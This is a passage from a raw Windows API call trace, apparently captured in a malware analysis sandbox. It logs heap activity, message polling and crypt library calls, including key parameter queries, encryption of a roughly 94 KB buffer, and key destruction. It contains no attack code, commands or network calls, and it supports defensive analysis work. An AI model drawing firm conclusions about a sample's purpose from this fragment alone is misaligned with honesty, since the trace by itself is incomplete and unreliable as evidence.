cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.562] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.565] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.565] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.565] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.566] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.566] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.566] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.566] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.566] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.566] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.566] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.567] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.567] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.567] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.567] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.568] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1719c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x171a0) returned 1 [0038.568] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.568] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.568] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.568] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.568] CharLowerBuffW (in: lpsz="byte[94625]", cchLength=0xb | out: lpsz="byte[94625]") returned 0xb [0038.568] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.570] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.570] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.571] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.572] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.572] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x963358*, pdwDataLen=0x6ae220*=0x1719c, dwBufLen=0x171a0 | out: pbData=0x963358*, pdwDataLen=0x6ae220*=0x171a0) returned 1 [0038.573] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.573] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.573] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.576] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.576] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.576] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.576] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.576] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.576] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.576] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.576] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.577] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.577] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.590] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.590] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.590] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.590] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.590] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.590] CryptDestroyKey (hKey=0x7c2280) returned 1 [0038.591] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.591] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.591] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) 